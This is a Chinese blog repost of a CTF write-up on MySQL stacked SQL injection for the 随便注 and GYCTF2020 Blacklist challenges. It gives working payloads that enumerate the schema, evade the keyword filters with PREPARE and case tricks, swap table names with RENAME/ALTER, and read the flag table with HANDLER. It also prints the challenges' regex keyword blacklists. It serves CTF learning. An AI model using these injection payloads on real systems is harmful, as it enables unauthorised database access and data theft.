[GYCTF2020]Blacklist&&[强网杯 2019]随便注

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量445 收藏
点赞数
原文链接:https://www.cnblogs.com/V1lu0/p/12827426.html
版权

因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下

先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。

blacklist比随便注多过滤了set,prepare,rename,alter。

过滤prepare,set是避免pdo预处理绕过

过滤rename,alter是避免修改表名的情况出现

而blacklist和随便注还有一种方法是handler ,mysql除可使用select查询表中的数据,也可使用handler语句

return preg_match("/select|update|delete|drop|insert|where|./i",$inject);//随便注过滤

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i",$inject); //blacklist过滤
根据上面的总结,其实我们就不用做blacklist,blacklist只是少了两种方法,而随便注则存在3种方法,所以我们可以通过强网杯的随便注举例子

注入类型:堆叠注入

题目名称: 2019强网杯随便注

方法演示:3种

1’;show databases; #堆叠注入查询所有数据库
1’;use supersqli; #选择supersqli这个数据库
1’;show tables; #查询supersqli数据库所有的表
1’;show columns from 1919810931114514;#查询1919810931114514表种字段
//
好的我们知道了flag在supersqli主句库的1919810931114514表中的flag字段里
预处理流程

SET; # 用于设置变量名和值
PREPARE stmt_name FROM preparable_stmt; # 用于预备一个语句,并赋予名称,以后可以引用该语句
EXECUTE stmt_name; # 执行语句
{DEALLOCATE | DROP} PREPARE stmt_name; # 用来释放掉预处理的语句
第一次构造

?inject=1’;set @sql=CONCAT(‘se’,‘lect * from 1919810931114514;’);prepare flag from @sql;execute flag;
返回下面这句话

strstr(KaTeX parse error: Expected 'EOF', got '&' at position 16: inject, "set") &̲& strstr(inject, “prepare”)
set与prepare关键词被拦下,但是strstr函数我们可以用大小写绕过

第二次构造

?inject=1’;Set @sql=CONCAT(‘se’,‘lect * from 1919810931114514;’);PrePare flag from @sql;execute flag;
拿到flag

原题目查询的数据表为words

我们使用未过滤的alert 和 rename两个函数,先把 words 改为其他,再把1919810931114514改为 words,然后把新的 words 表里的 flag 列改为 id ,这样就直接查询 flag

rename table words to test;
rename table 1919810931114514 to words;
alter table words change flag id varchar(100);
show columns from words;–+

ALTER TABLE tiger (表名) CHANGE tigername(要修改的列) name (修改后的列名) VARCHAR(20)(类型);

1’ or ‘1’='1 #获取flag
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

语法结构:

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…)
[ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT … ]

HANDLER tbl_name CLOSE
handler 1919810931114514 open;
handler 1919810931114514 read first;

payload:?inject=1’;handler 1919810931114514 open;handler 1919810931114514 read first;–+

uihijio
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
android_system_blacklist_android_msm8610_
10-03
msm8610 android system
buuctf web
CyhDl666的博客
02-01 883
文章目录[GYCTF2020]Blacklist[ZJCTF 2019]NiZhuanSiWei[CISCN2019 华北赛区 Day2 Web1]Hack World [GYCTF2020]Blacklist 入题 先输入’页面返回报错确定闭合方式 直接准备union入1' union select 1,2# 返回一个正则表达式return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1284
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 1521
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 6万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
BUUCTF WEB [GYCTF2020]Blacklist
Y1da的博客
04-18 220
BUUCTF WEB [GYCTF2020]Blacklist 提交1',报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 发现入点 尝试union入 /?inject=1' union select 1,2
GYCTF2020]Blacklist----总结下sql入的骚姿势
cainiao17441898的博客
05-19 163
解题: 前面怎么到这步的不做赘述(堆叠入)。这步的命令:1’;show columns from FlagHERE#; 那么要怎么打开这个表呢? 有几个解法: 解法一:使用handler open,handler close,handler read first。 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。 方法2: ALTER TABLE 语句用于在已有的
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
02-05
ipset-blacklist:一个bash脚本,禁止在黑名单中发布大量IP地址
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
Abuse-IP-blacklist:我的服务器和路由器上收集了滥用IP黑名单
03-15
滥用IP黑名单我的服务器和路由器上收集了滥用IP黑名单这些列表(1天,7天和30天)在这里主要供我个人使用,由我的服务器收集并分发回去,以在防火墙之间交换滥用IP黑名单。 这些列表每天更新一次。...
Blacklist:申请制作ENCODE黑名单
05-14
Sci Rep 9,9354(2019)。 可用的黑名单 对于那些对使用黑名单感兴趣的人, lists/文件夹中提供了dm3,dm6,ce10,ce11,mm10,hg19和hg38的当前版本。 系统要求 硬体需求 根据分析的基因组的大小和正在处理的...
[GYCTF2020]Blacklist(堆叠入)
记录学习,一起进步
01-19 1940
[GYCTF2020]Blacklist(堆叠入)
[GYCTF2020]Blacklist && 强网杯随便
SopRomeo的博客
04-08 1523
强网杯随便 先测试 字符型 1' or '1'='1 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤了select 先看表,看列 堆叠payload: 1';show tables;%23 1';show columns from `1919810931114514`;%...
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2408
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多入方法已经没有办法使用(联合查询 布尔盲 updataxml的报错入) 并且发现本关的入方法为 单引号 只能使用 堆叠入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错入 来查询库名 1' and (extractvalue(1,c
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2325
[GYCTF2020]Blacklist(堆叠入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GYCTF2020]Blacklist1
whale_waves的博客
11-07 83
其实这一题我看到的第一反应是基于布尔的盲 原因: 没有禁用ascii substr 之类的, 并且输入1和0时输入1会有回显0不会 这里将预编译入、联合入、报错入、都过滤的干净 通过它给出的黑名单考虑可用的命令 可尝试的 堆叠入例如show database和show tables handler命令 基于布尔的盲(通过1^0^1,真假真为假,1^1^1,真真真为真,来做手段) !!这里后面会排除掉,应为后面才想起来select被禁了,但是查询需要用
[GYCTF2020]Blacklist 1详解(handler命令用法!)
m0_73734159的博客
12-01 763
果不其然改表名的两个关键命令被过滤了。select这个查询命令大家都很熟悉。但是我们却忽略了一个也很重要的角色。虽然handler这个命令不常见。那就是handler查询命令。存在FlagHere数据表。极有可能当中存在flag。renamealter。包括查询命令也被过滤了。可知本题是字符型入。
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1565
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
SSID blacklist
08-16
抱歉,我无法提供关于SSID黑名单的具体信息。SSID(Service Set Identifier)是用于识别无线网络的名称,黑名单则是指被禁止或限制使用的列表。黑名单可能是由网络管理员或设备制造商维护的,目的是限制某些无线网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值